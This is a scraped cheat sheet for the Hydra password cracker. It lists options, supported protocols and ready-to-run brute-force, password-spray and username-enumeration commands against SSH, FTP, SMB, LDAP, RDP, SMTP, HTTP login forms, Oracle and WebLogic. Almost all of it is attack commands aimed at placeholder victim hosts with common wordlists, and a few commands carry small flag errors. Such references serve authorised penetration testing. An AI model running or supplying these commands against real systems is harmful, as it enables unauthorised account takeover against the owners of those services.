Password cracker, attacking online systems (not with hash).
💡 For big lists of user, try password=null/username/reverse-username without a wordlist. E.g.: hydra -L users.txt -e nsr $IP ssh -V
Help
hydraUseful options
-C FILE colon separated "login:pass" format, instead of -L/-P options
-e nsr try "n" null password, "s" username=password, "r" try the reverse login as pass
-l username
-L file with usernames
-p password
-P file with passwords
-f / -F exit when a login/pass pair is found
-t number of threads, default=16Protocols
adam6500 afp asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) mysql5 ncp nntp oracle oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp radmin2 redis rexec rlogin rpcap rsh rtsp s7-300 sapr3 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmppGraphical Version
# Start XHydra, graphical version of hydra
xhydraUsage Examples
# USERS can also be a specific account and not in a file. Example USERS=sa for mssql
# Brute force Oracle listener password
./hydra -P <Password File> -t <no of threads> -s 1521 (target default port) <target> oracle-listener
./hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener
# Bruteforce basic authentication
# Password: generate 6 chars, 0-9 and A-Z
hydra -L users.txt -x 6:6:1A "http://domain.com" http-head /path/
hydra -l admin -x 6:6:1A "http://domain.com" http-head /path/ -v
# Bruteforce same username as password, 6 chars 0-9A-Z
URL="domain.com"
URL_PATH="/"
hydra -l yourname -x 6:6:1A -e s "$URL" https-get "$URL_PATH"
# Verbose
hydra -l yourname -x 6:6:1A -e s "$URL" https-get "$URL_PATH" -v
hydra -C /usr/share/wordlists/user_pass.txt "$URL" https-get "$URL_PATH" -v
# Bruteforce using login file (user,pass)
URL="http://domain.com"
hydra -C /usr/share/wordlists/user_pass.txt -v "$URL" https-get
# Bruteforce login as password
URL="http://domain.com"
hydra -l yourname -x 6:6:1A -e s "$URL" https-get /path/login.php
hydra -l admin -P passwords.txt www.somesite.com https-post-form "/admin/login.php:parent%5Buname%5D=^USER^&parent%5Bpassword%5D=^PASS^:&_adminLogin=YES&SAVE=Login"
# SSH
IP=x.x.x.x
hydra -s 22 -l root -P /usr/share/wordlists/rockyou.txt -t 16 $IP ssh
#------------------------
# Resume session
#------------------------
hydra -RBruteforce FTP
IP=x.x.x.x
CREDS=/home/kali/creds.txt
USERS=/usr/share/seclists/Usernames/Names/names.txt
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txthydra -t 10 -V -f -e nsr -L $USERS -P $WL ftp://$IPhydra -t 10 -V -f -e nsr -C $CREDS ftp://$IPUsername=password & empty password
hydra -t 10 -V -f -e nsr -L $USERS ftp://$IPBruteforce Samba
IP=x.x.x.x
CREDS=/home/kali/creds.txt
USERS=/usr/share/seclists/Usernames/Names/names.txt
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txthydra -t 10 -V -f -e nsr -L $USERS -P $WL smb://$IPhydra -t 10 -V -f -e nsr -C $CREDS smb://$IPBruteforce LDAP
USERS=users.txt
IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
PROTOCOL=ldap2 # or ldap3hydra -t 10 -V -f -e nsr -L $USERS -P $WL $PROTOCOL://$IPPassword Spray
hydra -t 10 -V -f -L $USERS -p "MyDefaultPassword" $PROTOCOL://$IPTry an empty password 😉
hydra -t 10 -V -f -L $USERS -p "" $PROTOCOL://$IPBruteforce RDP
RDP does not reliably handle multiple threads.
IP=x.x.x.x
CREDS=/home/kali/creds.txt
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -l Administrator -P $WL -t 1 -s 3389 $IP rdphydra -t 1 -V -f -l administrator -P $WL rdp://${IP}hydra -e nsr -C $CREDS -t 1 -s 3389 $IP rdphydra -l john -p doe rdp://192.168.0.1/firstdomainnamehydra -e nsr -l user1 -P $WL -t 1 -s 3389 rdp://${IP}/DOMAINBruteforce SMTP
Bruteforce usernames
IP=x.x.x.x
USERS=/usr/share/seclists/Usernames/top-usernames-shortlist.txt
USERS=/usr/share/seclists/Usernames/Names/names.txt
USERS=/usr/share/seclists/Usernames/cirt-default-usernames.txthydra -L $USERS $IP smtp-enumhydra smtp-enum://${IP}/vrfy -L $USERShydra smtp-enum://${IP}/rcpt -L $USERSBruteforce passwords
IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txthydra -e nsr -l root -P $WL $IP smtphydra -e nsr -l user@example.com -P $WL $IP smtphydra -e nsr -l user@example.com -P $WL -S 565 $IP smtpBruteforce HTTP Protocol
Login forms – HTTP POST
❗ This module produces a lot of false positives when using the “failed login” message. Whenever possible, use the “success” message instead or use Burp Pro.
IP=x.x.x.x
PORT=80
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
FAILED_MSG="INVALID LOGIN"
#SUCCESS_MSG="logged in as"
SUCCESS_MSG="302 Found"
COOKIES="cookie1=value1"hydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:$FAILED_MSG" -e nsr -l admin -P $WL -vV -fhydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:S=$SUCCESS_MSG" -e nsr -l admin -P $WL -vV -fhydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:$FAILED_MSG:H=Cookie: ${COOKIES}" -e nsr -l admin -P $WL -vV -fhydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:S=$SUCCESS_MSG:H=Cookie: ${COOKIES}" -e nsr -l admin -P $WL -vV -fHTTP GET – Basic auth
IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -e nsr -L users.txt -P $WL $IP http-get /webdav/ -vBruteforce Oracle SIDs
See Oscanner in Oracle Database.
IP=x.x.x.x
hydra -L /usr/share/oscanner/services.txt -s 1521 $IP oracle-sidBruteforce Oracle Weblogic
IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -e nsr -s 7879 -v -l weblogic -p $WL -t 4 -w 5 -F -m "/" $IP https-get
hydra -e nsr -s 443 -v -l weblogic -p $WL -t 4 -w 5 -F -m "/" $IP https-get